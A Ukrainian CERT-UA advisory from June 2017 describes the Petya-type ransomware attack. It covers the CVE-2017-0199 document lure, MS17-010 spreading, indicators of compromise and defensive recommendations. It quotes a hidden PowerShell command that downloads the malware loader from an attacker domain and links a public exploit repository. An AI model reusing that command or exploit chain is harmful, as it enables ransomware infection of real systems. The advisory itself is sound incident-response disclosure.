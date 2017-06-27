В першій половині дня (27.06.2017) розпочалася масова атака на український та комерційний сектор із застосування шкідливого програмного забезпечення, що позиціонується як Petya Ransomware.

Спеціалістами команди реагування на комп’ютерні надзвичайні подій України CERT-UA був проаналізований файл:

[Order-20062017.doc][415FE69BF32634CA98FA07633F4118E1]

hxxps://www.virustotal.com/en/file/fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206/analysis/





Даний файл, експлуатовував вразливість CVE-2017-0199 (https://github.com/bhdresh/CVE-2017-0199).

Після експлуатації вразливості на інфікований комп’ютер завантажувався xls-файл (hxxp://84.200.16.242/myguy.xls)

[myguy.xls][0487382a4daf8eb9660f1c67e30f8b25]

hxxps://www.virustotal.com/en/file/ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6/analysis/





Після деобфускації коду вдалося вияснити, що за допомогою команди Powershell на інфікований комп’ютербув завантажений виконуваний файл:

[myguy.exe][224500132b2537d599fe3314717b7ee5]

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘hxxp://french-cooking.com/myguy.exe’, ‘%APPDATA%\{random_name}.exe’)

Даний виконуваний файл використовувся в якості завантажувача подальшого функціоналу шифрувальника файлів Petya Ransomware.

Командно-контрольний центр:

hххp://coffeinoffice.xyz:80/cup/wish.php

Механізм розповсюдження був запозичений від шифрувальника файлів WannaCry, що використовувала вразливість MS17-010 для розповсюдження як по локальній так і по глобальній мережі.

Після шифрування комп’ютера відбувалося перезавантаження системи, в результаті якої жертва отримувала повідомлення про викуп.

Даний тип шифрувальника пошкоджував таблицю MBR, в результаті чого завантаження операційної системи не продовжувалося.

За попередніми даними даний виконуваний файл завантажував в директорію C:\Windows файл з назвою perfc.dat, що виступав в якості основого функціоналу даного шифрувальника. Вдалося вияснити, що шифрувальник файлів встановлював в планувальнику задач команду на перезапуск системи. Після перезавантаження системи на інфікований комп’ютер приходив фейковий chkdsk.

Отже, можна стверджувати, що новий підвид Petya.A, який сьогодні атакував Україну — це комбінація вразливостей

CVE-2017-0199 і MS17-010 (ETERNALBLUE, використана в Wcry за результатами витоку через ShadowBrokers).

Перелік індикаторів компрометації:

84.200.16.242:80

french-cooking.com:443

coffeinoffice.xyz:80

File Name Order-20062017.doc (RTF із CVE-2017-0199)

MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1

SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84

SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206

File Name myguy.xls

MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25

SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73

SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6





Рекомендації CERT-UA:

Забезпечити неприпустимість відкриття вкладень у підозрілих повідомленнях (у листах від адресантів, щодо яких виникають сумніви; наприклад: автор з невідомих причин змінив мову спілкування; тема листа є нетиповою для автора; спосіб, у який автор звертається до адресата, є нетиповим тощо; а також у повідомленнях з нестандартним текстом, що спонукають до переходу на підозрілі посилання або до відкриття підозрілих файлів – архівів, виконуваних файлів і т.ін.).

Системним адміністраторам і адміністраторам безпеки звернути увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштового й веб-трафіку.

Установити офіційний патч MS17-010.

На мережевому обладнанні та груповими політиками заблокувати на системах та серверах порти 135, 445, 1024-1035 TCP.

В разі інфікування персонального комп’ютера не перезавантажувати систему.

Обмежити можливість запуску виконуваних файлів (*.exe) на комп’ютерах користувачів з директорій %TEMP%, %APPDATA%.

Звернутися до рекомендацій CERT—UA cтосовно безпеки поштових сервісів.

Для можливості відновлення зашифрованих файлів скористатися програмами ShadowExplorer або PhotoRec.